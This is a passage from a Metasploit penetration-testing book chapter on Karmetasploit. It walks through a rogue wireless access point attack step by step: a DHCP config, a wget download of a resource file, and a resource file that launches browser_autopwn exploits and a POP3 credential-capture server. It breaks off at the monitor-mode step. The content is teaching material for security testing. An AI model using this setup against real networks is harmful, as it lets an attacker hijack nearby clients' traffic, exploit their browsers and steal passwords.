Chapter 12. Karmetasploit

Karmetasploit is Metasploit’s implementation of KARMA, a set of wireless security tools developed by Dino Dai Zovi and Shane Macaulay. KARMA takes advantage of a vulnerability inherent in the way Windows XP and Mac OS X operating systems search for networks: When each system boots, it sends beacons looking for networks to which it has connected previously.

An attacker using KARMA sets up a fake access point on his computer and then listens for and responds to these beacons from the target, pretending to be whatever wireless network the client is looking for. Because most client computers are configured to connect automatically to wireless networks they have already used, KARMA can be used to gain complete control of a client’s network traffic, thus allowing an attacker to launch client-side attacks, capture passwords, and so forth. With the prevalence of poorly secured corporate wireless networks, an attacker using KARMA can sit in a nearby parking lot, adjacent office, or similar, and gain access to a target’s network with little effort. You can read more about the original implementation of KARMA at http://trailofbits.com/karma/.

Karmetasploit is the Metasploit Framework implementation of the KARMA attack. It implements various “evil” services including DNS, POP3, IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to most requests from clients and will serve up all kinds of malicious fun. (The various modules are in the modules/auxiliary/server directory of the Metasploit root directory.)

Karmetasploit requires very little configuration. To begin, we configure a DHCP server to be used to hand out IP addresses to wireless targets. Back|Track includes a DHCP server, but we will need to create a custom configuration file for it to use with Karmetasploit, as shown in the following listing:

 option domain-name-servers 10.0.0.1;
  default-lease-time 60;
  max-lease-time 72;
  ddns-update-style none;
  authoritative;
  log-facility local7;
  subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
          option routers 10.0.0.1;
          option domain-name-servers 10.0.0.1;
  }

We back up our original dhcpd.conf file by entering cp /etc/dhcp3/dhcpd.conf/etc/dhcp3/dhcpd.conf.back, and then we create a new file containing the data shown at , which will serve addresses in the range of 10.0.0.100 to 10.0.0.254 . (If you are unfamiliar with DHCP configurations, don’t worry; as long as your new dhcpd.conf looks similar to this it should work fine.)

Next, we download the KARMA resource file, because as of this writing it’s not included in the regular Metasploit trunk:

root@bt:/opt/metasploit3/msf3# wget
http://www.offensive-security.com/downloads/karma.rc

When we open the KARMA resource file karma.rc, we can see the sequence of events that occur when it runs, as shown here:

root@bt:/opt/metasploit3/msf3# cat karma.rc
  db_connect postgres:toor@127.0.0.1/msfbook
 use auxiliary/server/browser_autopwn
 setg AUTOPWN_HOST 10.0.0.1
  setg AUTOPWN_PORT 55550
  setg AUTOPWN_URI /ads
 set LHOST 10.0.0.1
  set LPORT 45000
  set SRVPORT 55550
  set URIPATH /ads
  run
 use auxiliary/server/capture/pop3
  set SRVPORT 110
  set SSL false
  run

After loading the database (db_connect postgres:toor@127.0.0.1/msfbook) in which to store its results, KARMA loads the browser_autopwn server as shown at . This is a handy way to attempt a number of exploits against a browser in an untargeted manner. A handful of the browser-based exploits in the Frame-work contain the directive include Msf::Exploit::Remote::BrowserAutopwn: Exploits that contain that include line will be attempted when the autopwn server is accessed.

At and , the local IP address is set to 10.0.0.1, which coincides with the default DHCP configuration. Then, in lines and on, the various servers are configured and started. (To get a complete picture of what occurs in this attack, read the resource file.)

Next, we place our wireless card in monitor mode. The way in which we do this depends on our wireless card’s chipset. The wireless card in the following example uses the RT73 chipset. We use airmon-ng start wlan0 to place it in monitor mode:

root@bt:/opt/metasploit3/msf3# airmon-ng start wlan0